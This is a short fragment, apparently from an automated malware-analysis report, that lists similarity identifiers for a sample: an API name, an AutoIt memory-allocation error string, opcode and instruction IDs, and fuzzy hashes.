                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                  • API String ID: 2030045667-4017498283
                                                                                                                                                                  • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                  • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                                                                  • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                  • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D